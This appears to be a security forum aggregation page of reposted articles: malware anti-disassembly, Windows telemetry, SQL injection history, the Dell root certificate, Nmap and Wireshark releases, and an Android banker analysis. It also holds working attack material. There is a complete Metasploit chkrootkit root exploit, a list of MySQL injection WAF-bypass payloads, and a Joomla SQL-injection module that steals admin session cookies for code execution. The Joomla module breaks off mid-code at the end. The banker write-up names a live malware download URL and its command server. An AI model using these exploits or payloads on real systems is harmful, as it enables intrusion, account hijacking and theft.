Nytro

Anti-Disassembly techniques used by malware (a primer) Rahul Nair | 22 Nov 2015 There are chances that malware authors implement some kind of trolling so that a malware analyst has a hard time figuring out code during static analysis (IDA Pro ?). Implementing these cunning asm instruction will not cause any issues to the flow of the program but will confuse static analysis tools such as IDA Pro from interpreting the code correctly. Once upon a time there were 2 kinds of disassembly algorithms -Linear disassembly and flow-oriented disassembly.The former was used in tutorials/ nobody gives a damn is not used that much in disassemblers. What we are concerned about is the latter which is used in IDA Pro and sometime gamed by malware authors- 1.Jump Instructions to a location with constant value This is the most used trick by malware writers/anti-disassembly programs which create jumps into the same location + 1 or 2 bytes. It would lead to interpretation of completely different byte code by the system. For instance the actual jump instance here would take the flow of program to the bytecode mentioned above. Since tools like IDA pro are not that clever(no offense to the creator) it cannot make such judgements and instead interprets the opcode from E8 instead which shows us a bunch of call instructions to some random crappy address, weird decrements and adds. No we can fix this with ease in IDA PRO. Do that by pressing D on the E8 and C key on the 8B Opcode and voila! you get what is actually being interpreted. After playing around more with the C & D key you get the following in IDA which seems legit Now what has happened here is that the the author might have inserted something known as a rogue byte which confuses IDA pro leading to a wrong interpretation of the rest of the opcode.This is a simple technique and if you dont like to see that ugly E8 byte you could NOP it out 2.Jump Instructions to the Same target IDA Pro usually follows this behavior where for a conditional instruction (jnz) it first disassembles the false branch of the conditional instruction and then moves forward to the true part. From a malware POV since both the jz and jnz are present it is similar to an unconditional jump Once IDA pro reaches the jz instruction it would first branch out and interpret the false instruction and move on to jnz where it would do the same.A nice and dirty trick is to insert a rogue byte code and make the disassembler interpret the instructions as a call. If we do the C & D thingy in IDA pro as mentioned in 1. we get the following code 3.Ping-Pong jumps I have no idea what this technique is named as but it involves doing a lot of jumping around using the method mentioned in 1.and maybe even a bit of 2 Let's look at this innocent jump below. This jumps goes back to loc_4012E6+2 which would be the EB opcode. If we ignore the 66 and B8 opcode ,make IDA interpret the rest as code instead we get the following Yay more jumps. Once again ignoring the other E8 byte and considering the rest as code the result is as follows- We can see how incorporating rogue bytes obscures the real function call from being hidden in static analysis. 4.Usage of Function Pointers Instead of a screen shot here is a piece of code mov [ebp+var8],offset sub4211C1 push 4Ah call [ebp+var_8] What happens above is that a function is called via use of a reference to an address. For example for the function call it would get the funciton stringname by the use of some weird bunch of decoding subroutine and save the value in an offset sub4211C1. This would make static analysis really hard since IDA won't recognize it easily. From a static analysis point of view though it dosen't seem to cause massive harm this coupled with other anti-disassembly techniques can lead to annoyance for an analyst. There are a couple more annoying techniques which I will explore in another post such as abusing the return pointer (for fun and profit:P ) ,using your own Structed Exception Handler (SEH) and screwing around with the stack-frame construction in IDA pro. Sursa: Anti-Disassembly techniques used by malware (a primer)

Microsoft Makes Windows 10 Automatic Spying Worse Microsoft MSFT +0.11% has been on a roll lately. Its massive Windows 10 update ‘Threshold 2’ has far more good features than bad ones, the ‘free upgrade’ rules have been improved and even Microsoft’s Black Friday 2015 dealsare surprisingly great. But a new discovery has been made which isn’t good news – at all… Earlier this month Microsoft finally went on record admitting that automatic spying within Windows 10 cannot be stopped. This sparked a lot of outrage and with ‘Threshold 2’ it appeared Microsoft had done a sharp U-turn because the background service at the heart tracking (the ‘Diagnostics Tracking Service’ aka ‘DiagTrack’) appeared to have been removed. Critics celebrated and it was another well deserved pat on the back for Microsoft. Except it turns out Microsoft had just been very sneaky. What Tweakhound discovered and was subsequentlyconfirmed by BetaNews, is Microsoft simply renamed DiagTrack. It is now called the ‘Connected User Experiences and Telemetry Service’ – which is both a) deliberately vague, and misleading (don’t ‘Connected User Experiences’ sound great). Windows 10 prior to the Threshold 2 update shows ‘Diagnostics Tracking Service’. Image credit: Tweakhound Even sneakier is, in being renamed, Microsoft also reset users preferences. Those who dug deep into the Windows 10 registry to disable DiagTrack will find it has been re-enabled now it is called the Connected User Experiences and Telemetry Service. Yes, tracking is back and without any warning and your preferences were irrelevant. The good news is you can disable the Connected User Experiences and Telemetry Service the same way as DiagTrack: Hold down the Windows key and tap the R key In the box that opens type ‘services.msc’ and press the Enter key In the ‘Services (Local)’ section locate ‘Connected User Experiences and Telemetry’ and double-click it In the ‘Service status’ section click ‘Stop’ Under the ‘Startup type’ drop down menu select ‘Disabled’ and then confirm this and close the window by clicking ‘OK’ Note: it is advisable to disable Not delete the service. Deleting it can cause problems Windows 10 prior to the Threshold 2 update shows ‘Connected User Experiences And Telemetry’ which executes the exact same service as DiagTrack. Image credit: Tweakhound So what is Microsoft thinking here? I’ve reached out to the company but, despite recognising my enquiry, it has yet to issue a statement. I’ll update this post when it does. While Microsoft thinks about what to say, I’d say the problem with the DiagTrack rebrand is the company wasn’t thinking. Subtle under the hood changes will always be picked up for such a high profile product. That said such a move is consistent with the negatives in Threshold 2 namely: it resets many user preferences (including basics like your preferred web browser) if they weren’t Microsoft product/services as well as silently deleting third party system monitoring apps like: CPU-Z, speccy, 8gadgetpack, SpyBot, HWMonitor and more. In my opinion it is this kind of overriding desire for control and a disregard for user choices which is harming Windows 10. At its core Windows 10 is a modern and highly capable platform, but it has been buried under ludicrous layers of control. Worst still it has created a two tier customer base where consumers are forced to take updates which businesses can delay, effectively turning everyday users into bug testers for corporations. It all feels unsavoury and unnecessary and (while it could be coincidence) there has been a -users-reluctant-to-switch/'>dramatic slowdown in Windows 10 growth after an explosive beginning. For the first ever Free version of Windows, that’s not great. How can Microsoft reignite the love for Windows 10? I’d say a good start would be to stop doing daft things like this… Sursa: http://www.forbes.com/sites/gordonkelly/2015/11/24/windows-10-automatic-spying-begins-again/

HTTPS e ok (depinde si de tine). HTTP nu e ok. Tor Browser e ok (depinde si de tine). Mozilla cu proxy Tor nu e ok. https://hackertarget.com/tor-exit-node-visualization/

[h=1]Chkrootkit Local Privilege Escalation[/h] ### This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class Metasploit4 < Msf::Exploit::Local # This could also be Excellent, but since it requires # up to one day to pop a shell, let's set it to Manual instead. Rank = ManualRanking include Msf::Post::File include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Chkrootkit Local Privilege Escalation', 'Description' => %q{ Chkrootkit before 0.50 will run any executable file named /tmp/update as root, allowing a trivial privsec. WfsDelay is set to 24h, since this is how often a chkrootkit scan is scheduled by default. }, 'Author' => [ 'Thomas Stangner', # Original exploit 'Julien "jvoisin" Voisin' # Metasploit module ], 'References' => [ ['CVE', '2014-0476'], ['OSVDB', '107710'], ['EDB', '33899'], ['BID', '67813'], ['CWE', '20'], ['URL', 'http://seclists.org/oss-sec/2014/q2/430'] ], 'DisclosureDate' => 'Jun 04 2014', 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'SessionTypes' => ['shell', 'meterpreter'], 'Privileged' => true, 'Stance' => Msf::Exploit::Stance::Passive, 'Targets' => [['Automatic', {}]], 'DefaultTarget' => 0, 'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h )) register_options([ OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit']) ]) end def check version = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1") if version =~ /chkrootkit version 0\.[1-4]/ Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end end def exploit print_warning('Rooting depends on the crontab (this could take a while)') write_file('/tmp/update', "#!/bin/sh\n(#{payload.encoded}) &\n") cmd_exec('chmod +x /tmp/update') register_file_for_cleanup('/tmp/update') print_status('Payload written to /tmp/update') print_status('Waiting for chkrootkit to run via cron...') end end Sursa: https://www.exploit-db.com/exploits/38775/

WRITTEN BY JOSEPH COX November 20, 2015 // 08:00 AM EST One of the hackers suspected of being behind the TalkTalk breach, which led to the personal details of at least 150,000 people being stolen, used a vulnerabilitydiscovered two years before he was even born. That method of attack was SQL injection (SQLi), where hackers typically enter malicious commands into forms on a website to make it churn out juicy bits of data. It's been used to steal the personal details of World Health Organization employees,grab data from the Wall Street Journal, and hit the sites of US federal agencies. “It’s the most easy way to hack,” the pseudonymous hacker w0rm, who was responsible for the Wall Street Journal hack, told Motherboard. The attack took only a “few hours.” But, for all its simplicity, as well as its effectiveness at siphoning the digital innards of corporations and governments alike, SQLi is relatively easy to defend against. So why, in 2015, is SQLi still leading to some of the biggest breaches around? SQLi was possibly first documented by Jeff Forristal in the hacker zine Phrack. Back then, Forristal went by the handle rain.forest.puppy, but he's now CTO of mobile security at cybersecurity vendor Bluebox security. “According to Microsoft, what you're about to read is not a problem, so don't worry about doing anything to stop it.” SQL, or Structured Query Language, is a programming language used to manage databases. In essence, it's used when a website needs to call up a piece of information from its database, either to process it or present it to a user. But Forristal had found that typing certain commands would force a server to reveal information stored on it. “People can possibly piggyback SQL commands,” he wrote. In the December 1998 issue of Phrack, Forristal wrote about a series of issues with a version of Microsoft SQL server. When Forristal's fellow researcher told Microsoft of the problems, “their answer was, well, hilarious,” he wrote. “According to them, what you're about to read is not a problem, so don't worry about doing anything to stop it.” Today, over 15 years after it was first publicly disclosed, SQLi repeatedly sits at thenumber one spot of vulnerabilities in the OWASP Top 10 report, which is released every three years by the Open Web Application Security Project (OWASP) Foundation,a non-profit that monitors the threats that websites face. Phrack's current logo. Image: Phrack “SQL injection is always the number one risk. That is a reflection of just how many incidents are out there, as well as other factors that keep it very high up there,” Troy Hunt, founder of breach site haveibeenpwned.com, told Motherboard in a phone interview. “When you go to a webpage, and you make a request, that parses part of the data in the request back to a server,” Hunt said. “For example, you read a news article, and the news article, in the address bar it has, “id=1”, and that gives you news article number 1, and then you get another one with ID 2.” But, “with a SQLi attack, an attacker changes that ID in the address bar to something that forces the database to do something it's not meant to do,” Hunt said, such as returning a piece of private data. An individual attack might just return one piece or section of info, so an attacker is likely to “repeat it it over and over and over again, as many times as is necessary, so they get every piece of data from the database,” Hunt said. Naturally, that's going to be quite time consuming. So, a hacker might use tools that automate the process instead. Those include Havij, which “is popular amongst script kiddies as it's for Windows and has a [graphical user interface],” Mustafa Al-Bassam, asecurity researcher and former LulzSec hacker, told Motherboard in an online chat. Another commonly used piece of software is sqlmap. “It crawls the pages on the website, similar to how a search engine crawler might, looks for input forms on the website, and submits the forms with inputs that might cause a MySQL syntax error,” Al-Bassam added. When the attacker is looking for a target to hit in the first place, that's just as simple to automate too. Image: sqlmap “They would use Google to search for URLs that are known to be typically associated with scripts that are vulnerable to SQL injection,” Al-Bassam said. “They would typically have a script that goes through all the URLs and tests them automatically to see if they're vulnerable.” “You could teach a 4-year-old to do it,” Al-Bassam added, summing up how incredibly easy the whole process is. Indeed, Hunt has uploaded a video of him teaching his 3-year-old son how to carry out an SQLi attack with Havij. “You put the URL in, here's all the data out,” Hunt told Motherboard. There are also ample on how to carry out an SQLi attack.The thing is, there are solutions ready to be deployed by website developers to stop SQLi attacks and the unnecessary leaking of customers data or corporate details. And those solutions have been around for years. One of those is the adoption of "prepared statements": when SQL commands controlling the database can’t be directly dictated by a user’s input. If the solutions are fairly straight forward, why are SQLi-based attacks still happening? “The benefit of prepared statements is that they set the semantics of a query so that any incoming data can’t surprise the developer by including syntax that changes a query intended to retrieve a single row into a query that extracts data from arbitrary tables,” Mike Shema, senior manager, software development engineer from Yahoo!, told Motherboard in an email. Another is to “use SQL libraries that take care of input sanitization for them,” Al-Bassam suggested. This, in short, scrubs any data entered by the user to remove any potential malicious parts of it. So, if SQLi is so easy that literally a child could do it, and the solutions are fairly straight forward, why are SQLi-based attacks still happening? “Any serious programmer should know about SQLi, but there's a massive shortage of programmers, so companies hire anyone even if they don't have the right training or experience to mitigate basic vulnerabilities,” Al-Bassam suggested. On top of this, “they're often put under pressure by their managers to develop functional software rather than secure software.” Shema from Yahoo! echoed this, and said that “Sometimes small apps with a narrow feature set just need to be written quickly,” meaning that the developers might bypass some of the mitigations for each attacks, despite them being relatively straight forward to implement. Hunt was slightly less forgiving, and didn't agree that it was because of pressure from higher management. Instead, he lamented about the large number of tutorials available to web developers online that, instead of providing decent advice, detail how to make systems that are vulnerable to SQLi. "I've seen multiple tutorials come up this year that have got blatant SQL injection risks in them,” he said. So just as script kiddies continue to share their SQLi on YouTube, there is parallel information sharing going on with website developers. “We've got this ability for anyone to stand up, and share their knowledge, and not always get it right,” Hunt said.Ultimately, the responsibility of the security of these sites, and the data they contain, boils down to web developers themselves. That means SQLi and the breaches it causes will remain, at least for a little while longer. Sursa: http://motherboard.vice.com/read/the-history-of-sql-injection-the-hack-that-will-never-go-away

Superfish 2.0: Dangerous Certificate on Dell Laptops breaks encrypted HTTPS Connections tl;dr Dell laptops come preinstalled with a root certificate and a corresponding private key. That completely compromises the security of encrypted HTTPS connections. I've provided an online check, affected users should delete the certificate. It seems that Dell hasn't learned anything from the Superfish-scandal earlier this year: Laptops from the company come with a preinstalled root certificate that will be accepted by browsers. The private key is also installed on the system and has been published now. Therefore attackers can use Man in the Middle attacks against Dell users to show them manipulated HTTPS webpages or read their encrypted data. The certificate, which is installed in the system's certificate store under the name "eDellRoot", gets installed by a software called Dell Foundation Services. This software is still available on Dell's webpage. According to the somewhat unclear description from Dell it is used to provide "foundational services facilitating customer serviceability, messaging and support functions". The private key of this certificate is marked as non-exportable in the Windows certificate store. However this provides no real protection, there are Tools to export such non-exportable certificate keys. A user of the plattform Reddit has posted the Key there. For users of the affected Laptops this is a severe security risk. Every attacker can use this root certificate to create valid certificates for arbitrary web pages. Even HTTP Public Key Pinning (HPKP) does not protect against such attacks, because browser vendors allow locally installed certificates to override the key pinning protection. This is a compromise in the implementation that allows the operation of so-called TLS interception proxies. I was made aware of this issue a while ago by Kristof Mattei. We asked Dell for a statement two weeks ago and didn't get any answer. It is currently unclear which purpose this certificate served. However it seems unliklely that it was placed there deliberately for surveillance purposes. In that case Dell wouldn't have installed the private key on the system. Affected are only users that use browsers or other applications that use the system's certificate store. Among the common Windows browsers this affects the Internet Explorer, Edge and Chrome. Not affected are Firefox-users, Mozilla's browser has its own certificate store. Users of Dell laptops can check if they are affected with an online check tool. Affected users should immediately remove the certificate in the Windows certificate manager. The certificate manager can be started by clicking "Start" and typing in "certmgr.msc". The "eDellRoot" certificate can be found under "Trusted Root Certificate Authorities". This incident is almost identical with the Superfish-incident. Earlier this year it became public that Lenovo had preinstalled a software called Superfish on its Laptops. Superfish intercepts HTTPS-connections to inject ads. It used a root certificate for that and the corresponding private key was part of the software. After that incident several other programs with the same vulnerability were identified, they all used a software module called Komodia. Similar vulnerabilities were found in other software products, for example in Privdog and in the ad blocker Adguard. This article is mostly a translation of a German article I wrote for Golem.de. Image source and license: Wistula / Wikimedia Commons, Creative Commons by 3.0 Sursa: https://blog.hboeck.de/archives/876-Superfish-2.0-Dangerous-Certificate-on-Dell-Laptops-breaks-encrypted-HTTPS-Connections.html

mysql injection concat() replacements @sergey_lakantar select export_set(1,version(),user(),' : ',2); 5.1.7 : my_user select export_set(1,version(),export_set(1,user(),schema(),' : ',2),' : ',2); 5.1.7 : my_user : my_db select make_set(7,version(),user(),schema()); 5.1.7,my_user,my_db select replace(make_set(7,version(),user(),schema()),',',' : '); 5.1.7 : my_user : my_db select insert(insert(version(),length(version())--1,0,user()) ,length(version())--1,0,' : '); 5.1.7 : my_user select insert(insert(schema(),length(schema())--1,0,insert(insert(version(),length(version())--1,0,user()) ,length(version())--1,0,' : ')),length(schema())--1,0,' : '); 5.1.7 : my_user : my_db select replace(replace(replace('!?$','!',version()),'?',' : '),'$',user()); 5.1.7 : my_user select replace(replace(replace(replace('!?$?^','!',version()),'?',' : '),'$',user()),'^',schema()); 5.1.7 : my_user : my_db select lpad(lpad(user(),@x:=length(user())--3,' : '),@x--length(version()),version()) 5.1.7 : my_user select lpad(lpad(lpad(lpad(schema(),@x:=length(schema())--3,' : '),@x--length(user()),user()),@x--length(user())--3,' : '),@x--length(user())--3--length(version()),version()); 5.1.7 : my_user : my_db select rpad(rpad(version(),@x:=length(version())--3,' : '),@x--length(user()),user()); 5.1.7 : my_user select rpad(rpad(rpad(rpad(version(),@x:=length(version())--3,' : '),@x--length(user()),user()),@x--length(user())--3,' : '),@x--length(user())--3--length(schema()),schema()); 5.1.7 : my_user : my_db group_concat() without comma- select (select group_concat(a separator ' : ') from (select version()a union select user() union select schema())x); 5.1.7 : my_user : my_db concat() waf bypass- /*!50000group_coNcat(*/) /*!50000coNcat(*/) `coNcat`%0a%0b%0c%0d%a0() {snoopdogg concat()} {s {n {o {o {p {d {o {g {g`coNcat`()}}}}}}}}} {s {n {o {o {p {d {o {g {g`coNcat`/*!50000(*/)}}}}}}}}} {s {n {o {o {p {d {o {g {g`coNcat`/*!50000 /*! /*!40000 /*! /*!(*/((((1 %23aaa%0a )))))}}}}}}}}} concat-- a%0a() concat%23aaaaaaaaaa..........%0a(%23aaaaaaa.........%0a) concat/**x**/() Modsecurity- concat+() Link: concat() replacements - Pastebin.com

Nmap 7 Released November 19, 2015 The Nmap Project is pleased to announce the immediate, free availability of the Nmap Security Scanner version 7.00 from https://nmap.org/. It is the product of three and a half years of work, nearly 3200 code commits, and more than a dozen point releases since the big Nmap 6 release in May 2012. Nmap turned 18 years old in September this year and celebrates its birthday with 171 new NSE scripts, expanded IPv6 support, world-class SSL/TLS analysis, and more user-requested features than ever. We recommend that all current users upgrade. Contents: About Nmap Top 7 Improvements in Nmap 7 Press Screen Shots Detailed Improvements Moving Forward (Future Plans) Acknowledgments Download and updates Top 7 Improvements in Nmap 7 Before we get into the detailed changes, here are the top 7 improvements in Nmap 7: 1. Major Nmap Scripting Engine (NSE) Expansion As the Nmap core has matured, more and more new functionality is developed as part of our NSE subsystem instead. In fact, we've added 171 new scripts and 20 libraries since Nmap 6. Examples include firewall-bypass, supermicro-ipmi-conf, oracle-brute-stealth, and ssl-heartbleed. And NSE is now powerful enough that scripts can take on core functions such as host discovery (dns-ip6-arpa-scan), version scanning (ike-version, snmp-info, etc.), and RPC grinding (rpc-grind). There's even a proposal to implement port scanning in NSE. [More Details] 2. Mature IPv6 support IPv6 scanning improvements were a big item in the Nmap 6 release, but Nmap 7 outdoes them all with full IPv6 support for CIDR-style address ranges, Idle Scan, parallel reverse-DNS, and more NSE script coverage. [More Details] 3. Infrastructure Upgrades We may be an 18-year-old project, but that doesn't mean we'll stick with old, crumbling infrastructure! The Nmap Project continues to adopt the latest technologies to enhance the development process and serve a growing user base. For example, we converted all of Nmap.Org to SSL to reduce the risk of trojan binaries and reduce snooping in general. We've also been using the Git version control system as a larger part of our workflow and have an official Github mirror of the Nmap Subversion source repository and we encourage code submissions to be made as Github pull requests. We also created an official bug tracker which is also hosted on Github. Tracking bugs and enhancement requests this way has already reduced the number which fall through the cracks. [More Details] 4. Faster Scans Nmap has continually pushed the speed boundaries of synchronous network scanning for 18 years, and this release is no exception. New Nsock engines give a performance boost to Windows and BSD systems, target reordering prevents a nasty edge case on multihomed systems, and NSE tweaks lead to much faster -sV scans. [More Details] 5. SSL/TLS scanning solution of choice Transport Layer Security (TLS) and its predecessor, SSL, are the security underpinning of the web, so when big vulnerabilities like Heartbleed, POODLE, and FREAK come calling, Nmap answers with vulnerability detection NSE scripts. The ssl-enum-ciphers script has been entirely revamped to perform fast analysis of TLS deployment problems, and version scanning probes have been tweaked to quickly detect the newest TLS handshake versions. [More Details] 6. Ncat Enhanced We are excited and proud to announce that Ncat has been adopted by the Red Hat/Fedora family of distributions as the default package to provide the "netcat" and "nc" commands! This cooperation has resulted in a lot of squashed bugs and enhanced compatibility with Netcat's options. Also very exciting is the addition of an embedded Lua interpreter for creating simple, cross-platform daemons and traffic filters. 7. Extreme Portability Nmap is proudly cross-platform and runs on all sorts of esoteric and archaic systems. But our binary distributions have to be kept up-to-date with the latest popular operating systems. Nmap 7 runs cleanly on Windows 10 all the way back to Windows Vista. By popular request, we even built it to run on Windows XP, though we suggest those users upgrade their systems. Mac OS X is supported from 10.8 Mountain Lion through 10.11 El Capitan. Plus, we updated support for Solaris and AIX. And Linux users—you have it easy. Link: https://nmap.org/7/

[h=3]Android malware drops Banker from PNG file[/h] Nowadays is malware trying to hide wherever it is possible to get under the radar of anti-virus companies. Lately I found Trojan dropper carrying malicious payload, encoded by base64, embedded inside an image file. It’s nothing special these days but it is very rare dropping technique. In the most cases are malware authors lazy enough to not even encrypt the payload file. [h=3]Analysis[/h] In the time of writing this blog post is this Trojan dropper still available to download from attacker server (hxxp://jackdojacksgot.ru/img/Update.apk). Based on VirusTotal is detection for this Trojan dropper very poor. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 1 VirusTotal detection [/TD] [/TR] [/TABLE] This malicious application masquerade itself as Adobe Flash Player. Based on alternative names I found in application resources malware name can be different in the other versions like: Viber New, App4porno,CommBank, My Online Security, Viber or Whatsapp. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 2 Possible Trojan dropper names [/TD] [/TR] [/TABLE] After launch, Trojan will immediately drop and request user to install Adobe Flash Player. But first let’s take a look on dropping technique. In app assets there is nothing else to drop other than image file. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 3 Trojan dropper assets [/TD] [/TR] [/TABLE] There is only one image of dices stored in assets, but it size is more than 3.6 MB and that’s bit suspicious. After inspecting the code application wasn’t dropping this PNG file. The Trojan dropper at first opens this image file and searches for delimiter string, in this case "12345678901234567890". Right after this delimiter is stored another application encoded by Base64. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 4 Dropping embedded malware [/TD] [/TR] [/TABLE] [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 5 Binary view of PNG file [/TD] [/TR] [/TABLE] Decoded data are then stored on external storage as “prefix.apk” and demand to install. Decoded application, prefix.apk, is heavily obfuscated Android banker, stealing user credentials. After installation it requests user to activate Administrator rights for application. This is the simplest method that prevents to uninstall this Trojan. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 6 Banker install and device administrator request [/TD] [/TR] [/TABLE] If user tries to deactivate Administrator rights then is repeatedly asked to activate it again. There are two ways how to get rid of this nasty banker. Either by going to safe mode of your device and deactivate Administrator rights and uninstall it or by using Android Debug Bridge (adb) and uninstall it from your computer. Both apps Trojan dropper and dropped banker are the most probably obfuscated and protected by DexProtector. It’s very complicated to analyze it statically without any dynamical intervention. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 7 Code obfuscation [/TD] [/TR] [/TABLE] Banker can steal user login credentials or credit card information with phishing technique. When user opens his mobile banking application or just Google Play Store, malicious activity will be displayed on the top of the official application. This way user can be easily fooled and insert sensitive information to banker pop-up window. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 8 Bankers phishing windows [/TD] [/TR] [/TABLE] User credentials are immediately sent to remote server. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 9 Send stolen credentials for Gmail app [/TD] [/TR] [/TABLE] [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 10 Send stolen credentials for CommBank app [/TD] [/TR] [/TABLE] [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 11 Send stolen credentials for PayPal app [/TD] [/TR] [/TABLE] This banker is very popular. Lately I tweeted about same banker but stored on different server. [h=3]More information[/h] HASH dropper: 1F41BA0781D51751971EE705DFA307D2 HASH PNG: 575551FBC343EC8E1A1C771D81963096 HASH dropped: 90886B56372F5191A78A20DCB3F9FE6E Download link: http://jackdojacksgot.ru/img/Update.apk Remote server: 75jng75ufnf.ru:2080 Posted by Lukas Stefanko at 11:47 PM Sursa: http://b0n1.blogspot.ro/2015/11/android-malware-drops-banker-from-png.html

Network protocol analyzer Wireshark 2.0 released Posted on 24 November 2015. Wireshark, the most popular network protocol analyzer, has reached version 2.0. It features a completely new user interface which should provide a smoother, faster user experience. Here's an in-depth video introduction to Wireshark 2.0 The libwireshark API has undergone some major changes: The emem framework (including all ep_ and se_ memory allocation routines) has been completely removed in favour of wmem which is now fully mature. The (long-since-broken) Python bindings support has been removed. If you want to write dissectors in something other than C, use Lua. Plugins can now create GUI menu items. Heuristic dissectors can now be globally enabled/disabled so heur_dissector_add() has a few more parameters to make that possible proto_tree_add_text has been removed. tvb_length() has been removed in favor of tvb_reported_length() and tvb_captured_length(). The API for ONC RPC-based dissectors has changed significantly: the procedure dissectors no longer take an offset, void-argument procedures now need to be declared with a function (use dissect_rpc_void()), and rpc_init_prog() now handles procedure registration too (it takes additional arguments to handle this; rpc_init_proc_table() was removed). The following features are new (or have been significantly updated) since version 2.0.0rc3: An RTP player crash has been fixed. Flow graph issues have been fixed. A Follow Stream dialog crash has been fixed. An extcap crash has been fixed. A file merge crash has been fixed. A handle leak crash has been fixed. Several other crashes and usability issues have been fixed. Sursa: http://www.net-security.org/secworld.php?id=19147

autopwn Specify targets and run sets of tools against them autopwn is designed to make a pentester's life easier and more consistent by allowing them to specify tools they would like to run against targets, without having to type them in a shell or write a script. This tool will probably be useful during certain exams as well.. Installation It is recommended that you use the docker image while exposing TCP 5000 for autopwn clients to connect to. This is because the autopwn docker image is already setup (tools are installed and in the right place). Only allow this package to listen on a loopback IP address. If you have this package listen on a public IP, you're allowing arbitrary users to execute commands as root on your server. Eventually, HTTPS and credentials will be required, but for now, don't be a moron. From Docker Execute docker pull rascal999/autopwn Run docker run -i -t -p 127.0.0.1:5000:5000 rascal999/autopwn /usr/sbin/autopwn Run autopwn client (you can get the Java application at https://github.com/rascal999/autopwn-gui) From the Python Package Index (for development) Execute pip install autopwn From this repository Clone the Git repository Change into the newly created directory Execute pip install . Usage Running autopwn will start the web server. Sample output * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit) * Restarting with stat 127.0.0.1 - - [15/Nov/2015 11:04:41] "GET /ping HTTP/1.1" 200 - 127.0.0.1 - - [15/Nov/2015 11:04:41] "GET /favicon.ico HTTP/1.1" 404 - In order to interface with autopwn you should use autopwn-gui (available at https://github.com/rascal999/autopwn-gui). You can also use autopwn-cli (available at https://github.com/rascal999/autopwn-cli). If you're interested in the API, you can also do stuff in the browser. Contributing Fork it! Create your feature branch: git checkout -b my-new-feature Commit your changes: git commit -am 'Add some feature' Push to the branch: git push origin my-new-feature Submit a pull request Credits Developed by Aidan Marlin (aidan [dot] marlin [at] nccgroup [dot] com) while working at NCC Group. I'd like to thank the following contributors for their work on previous autopwn versions: Selfegris 0xsauby berdario Sursa: https://github.com/nccgroup/autopwn

[h=1]Joomla Content History SQLi Remote Code Execution[/h] ### This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "Joomla Content History SQLi Remote Code Execution", 'Description' => %q{ This module exploits a SQL injection vulnerability found in Joomla versions 3.2 up to 3.4.4. The vulnerability exists in the Content History administrator component in the core of Joomla. Triggering the SQL injection makes it possible to retrieve active Super User sessions. The cookie can be used to login to the Joomla administrator backend. By creating a new template file containing our payload, remote code execution is made possible. }, 'License' => MSF_LICENSE, 'Author' => [ 'Asaf Orpani', # Vulnerability discovery 'xistence <xistence[at]0x90.nl>' # Metasploit module ], 'References' => [ [ 'CVE', '2015-7857' ], # Admin session hijacking [ 'CVE', '2015-7297' ], # SQLi [ 'CVE', '2015-7857' ], # SQLi [ 'CVE', '2015-7858' ], # SQLi [ 'URL', 'https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/' ], [ 'URL', 'http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html' ] ], 'Payload' => { 'DisableNops' => true, # Arbitrary big number. The payload gets sent as POST data, so # really it's unlimited 'Space' => 262144, # 256k }, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Joomla 3.x <= 3.4.4', {} ] ], 'Privileged' => false, 'DisclosureDate' => "Oct 23 2015", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to Joomla', '/']) ], self.class) end def check # Request using a non-existing table res = sqli(rand_text_alphanumeric(rand(10)+6)) if res && res.body =~ /`(.*)_ucm_history`/ return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def sqli( tableprefix ) # SQLi will only grab Super User sessions with a valid username and userid (else they are not logged in). # The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history. # This way we make sure that's excluded and we only get real admin sessions. sql = " (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM #{tableprefix}session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)" # Retrieve cookies res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "index.php"), 'vars_get' => { 'option' => 'com_contenthistory', 'view' => 'history', 'list[ordering]' => '', 'item_id' => '1', 'type_id' => '1', 'list[select]' => sql } }) return res end def exploit # Request using a non-existing table first, to retrieve the table prefix res = sqli(rand_text_alphanumeric(rand(10)+6)) if res && res.code == 500 && res.body =~ /`(.*)_ucm_history`/ table_prefix = $1 print_status("#{peer} - Retrieved table prefix [ #{table_prefix} ]") else fail_with(Failure::Unknown, "#{peer} - Error retrieving table prefix") end # Retrieve the admin session using our retrieved table prefix res = sqli("#{table_prefix}_") if res && res.code == 500 && res.body =~ /Duplicate entry '([a-z0-9]+)' for key/ auth_cookie_part = $1[0...-1] print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]") else fail_with(Failure::Unknown, "#{peer}: No logged-in admin user found!") end # Retrieve cookies res = send_request_cgi({ 'method' 